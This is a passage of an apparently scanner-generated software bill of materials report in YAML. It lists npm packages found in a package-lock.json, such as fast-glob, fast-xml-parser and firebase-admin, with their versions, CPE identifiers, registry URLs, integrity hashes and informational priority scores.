locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:farmhash-modern:farmhash-modern:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:farmhash-modern:farmhash_modern:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:farmhash_modern:farmhash-modern:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:farmhash_modern:farmhash_modern:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:farmhash:farmhash-modern:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:farmhash:farmhash_modern:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/farmhash-modern@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/farmhash-modern/-/farmhash-modern-1.1.0.tgz + integrity: sha512-6ypT4XfgqJk/F3Yuv4SX26I3doUjt0GTG4a+JgWxXQpxXzTBq8fPUeGHfcYMMDPHJHm3yPOSjaeBwBGAHWXCdA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7b51b4692c5fdf0a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fast-deep-equal 2.0.1' + title: fast-deep-equal 2.0.1 + description: 'Package discovered: fast-deep-equal 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 18c3431d6798a7cd + name: fast-deep-equal + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fast-deep-equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-deep-equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_deep_equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_deep_equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast:fast-deep-equal:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast:fast_deep_equal:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fast-deep-equal@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-2.0.1.tgz + integrity: sha512-bCK/2Z4zLidyB4ReuIsvALH6w31YfAQDmXMqMx6FyfHqvBxtjC0eRumeSu4Bs3XtXwpyIywtSTrVT99BxY1f9w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: df8671df2c12ad48 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fast-deep-equal 3.1.3' + title: fast-deep-equal 3.1.3 + description: 'Package discovered: fast-deep-equal 3.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5dcd27213b9411fd + name: fast-deep-equal + version: 3.1.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fast-deep-equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-deep-equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_deep_equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_deep_equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast:fast-deep-equal:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast:fast_deep_equal:3.1.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fast-deep-equal@3.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz + integrity: sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f137c47d21c65abc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fast-equals 5.4.0' + title: fast-equals 5.4.0 + description: 'Package discovered: fast-equals 5.4.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fea7469744f21377 + name: fast-equals + version: 5.4.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fast-equals:fast-equals:5.4.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-equals:fast_equals:5.4.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_equals:fast-equals:5.4.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_equals:fast_equals:5.4.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast:fast-equals:5.4.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast:fast_equals:5.4.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fast-equals@5.4.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fast-equals/-/fast-equals-5.4.0.tgz + integrity: sha512-jt2DW/aNFNwke7AUd+Z+e6pz39KO5rzdbbFCg2sGafS4mk13MI7Z8O5z9cADNn5lhGODIgLwug6TZO2ctf7kcw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c3d9f6c04405728e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fast-glob 3.3.3' + title: fast-glob 3.3.3 + description: 'Package discovered: fast-glob 3.3.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 756085ffd4026f3c + name: fast-glob + version: 3.3.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fast-glob:fast-glob:3.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-glob:fast_glob:3.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_glob:fast-glob:3.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_glob:fast_glob:3.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast:fast-glob:3.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast:fast_glob:3.3.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fast-glob@3.3.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.3.tgz + integrity: sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg== + dependencies: + '@nodelib/fs.stat': ^2.0.2 + '@nodelib/fs.walk': ^1.2.3 + glob-parent: ^5.1.2 + merge2: ^1.3.0 + micromatch: ^4.0.8 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c31f574684b9f10b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fast-xml-builder 1.1.5' + title: fast-xml-builder 1.1.5 + description: 'Package discovered: fast-xml-builder 1.1.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b198a6d2f9894f68 + name: fast-xml-builder + version: 1.1.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fast-xml-builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-xml-builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_xml_builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_xml_builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast-xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast_xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast:fast-xml-builder:1.1.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fast:fast_xml_builder:1.1.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fast-xml-builder@1.1.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.5.tgz + integrity: sha512-4TJn/8FKLeslLAH3dnohXqE3QSoxkhvaMzepOIZytwJXZO69Bfz0HBdDHzOTOon6G59Zrk6VQ2bEiv1t61rfkA== + dependencies: + path-expression-matcher: ^1.1.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b4dd20a63e4dfb25 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fast-xml-parser 5.7.2' + title: fast-xml-parser 5.7.2 + description: 'Package discovered: fast-xml-parser 5.7.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 03ef00f42507be2f + name: fast-xml-parser + version: 5.7.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:naturalintelligence:fast-xml-parser:5.7.2:*:*:*:*:*:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/fast-xml-parser@5.7.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.7.2.tgz + integrity: sha512-P7oW7tLbYnhOLQk/Gv7cZgzgMPP/XN03K02/Jy6Y/NHzyIAIpxuZIM/YqAkfiXFPxA2CTm7NtCijK9EDu09u2w== + dependencies: + '@nodable/entities': ^2.1.0 + fast-xml-builder: ^1.1.5 + path-expression-matcher: ^1.5.0 + strnum: ^2.2.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0cdc7a6cc314eb50 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fastq 1.20.1' + title: fastq 1.20.1 + description: 'Package discovered: fastq 1.20.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 32597e8bd5ad1e0f + name: fastq + version: 1.20.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fastq:fastq:1.20.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fastq@1.20.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fastq/-/fastq-1.20.1.tgz + integrity: sha512-GGToxJ/w1x32s/D2EKND7kTil4n8OVk/9mycTc4VDza13lOvpUZTGX3mFSCtV9ksdGBVzvsyAVLM6mHFThxXxw== + dependencies: + reusify: ^1.0.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 98eadb7c6959fda9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: faye-websocket 0.11.4' + title: faye-websocket 0.11.4 + description: 'Package discovered: faye-websocket 0.11.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5a9d4671ef023c43 + name: faye-websocket + version: 0.11.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:faye-websocket:faye-websocket:0.11.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:faye-websocket:faye_websocket:0.11.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:faye_websocket:faye-websocket:0.11.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:faye_websocket:faye_websocket:0.11.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:faye:faye-websocket:0.11.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:faye:faye_websocket:0.11.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/faye-websocket@0.11.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/faye-websocket/-/faye-websocket-0.11.4.tgz + integrity: sha512-CzbClwlXAuiRQAlUyfqPgvPoNKTckTPGfwZV4ZdAhVcP2lh9KUxJg2b5GkE7XbjKQ3YJnQ9z6D9ntLAlB+tP8g== + dependencies: + websocket-driver: '>=0.5.1' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 64d0cebc4ed83cee + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fdir 6.5.0' + title: fdir 6.5.0 + description: 'Package discovered: fdir 6.5.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4d9064c107e69a4e + name: fdir + version: 6.5.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fdir:fdir:6.5.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fdir@6.5.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz + integrity: sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7b56dfc5637424f2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fflate 0.8.2' + title: fflate 0.8.2 + description: 'Package discovered: fflate 0.8.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ad8b63b86fd3ee37 + name: fflate + version: 0.8.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fflate:fflate:0.8.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fflate@0.8.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fflate/-/fflate-0.8.2.tgz + integrity: sha512-cPJU47OaAoCbg0pBvzsgpTPhmhqI5eJjh/JIu8tPj5q+T7iLvW/JAYUqmE7KOB4R1ZyEhzBaIQpQpardBF5z8A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d2d1a258c47b4e8a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fill-range 7.1.1' + title: fill-range 7.1.1 + description: 'Package discovered: fill-range 7.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: adf22420cd3811ab + name: fill-range + version: 7.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fill-range:fill-range:7.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fill-range:fill_range:7.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fill_range:fill-range:7.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fill_range:fill_range:7.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fill:fill-range:7.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:fill:fill_range:7.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fill-range@7.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz + integrity: sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg== + dependencies: + to-regex-range: ^5.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0d132a7f95881c19 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: finalhandler 1.3.2' + title: finalhandler 1.3.2 + description: 'Package discovered: finalhandler 1.3.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 257d2278606af57b + name: finalhandler + version: 1.3.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:finalhandler:finalhandler:1.3.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/finalhandler@1.3.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.2.tgz + integrity: sha512-aA4RyPcd3badbdABGDuTXCMTtOneUCAYH/gxoYRTZlIJdF0YPWuGqiAsIrhNnnqdXGswYk6dGujem4w80UJFhg== + dependencies: + debug: 2.6.9 + encodeurl: ~2.0.0 + escape-html: ~1.0.3 + on-finished: ~2.4.1 + parseurl: ~1.3.3 + statuses: ~2.0.2 + unpipe: ~1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a37c455231ce6925 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: find-up 4.1.0' + title: find-up 4.1.0 + description: 'Package discovered: find-up 4.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: dde504db4cea8c91 + name: find-up + version: 4.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:find-up:find-up:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:find-up:find_up:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:find_up:find-up:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:find_up:find_up:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:find:find-up:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:find:find_up:4.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/find-up@4.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz + integrity: sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw== + dependencies: + locate-path: ^5.0.0 + path-exists: ^4.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6285de3b3f3c2477 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: firebase-admin 12.7.0' + title: firebase-admin 12.7.0 + description: 'Package discovered: firebase-admin 12.7.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 01aea657af389bb4 + name: firebase-admin + version: 12.7.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:firebase-admin:firebase-admin:12.7.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:firebase-admin:firebase_admin:12.7.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:firebase_admin:firebase-admin:12.7.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:firebase_admin:firebase_admin:12.7.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:firebase:firebase-admin:12.7.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: 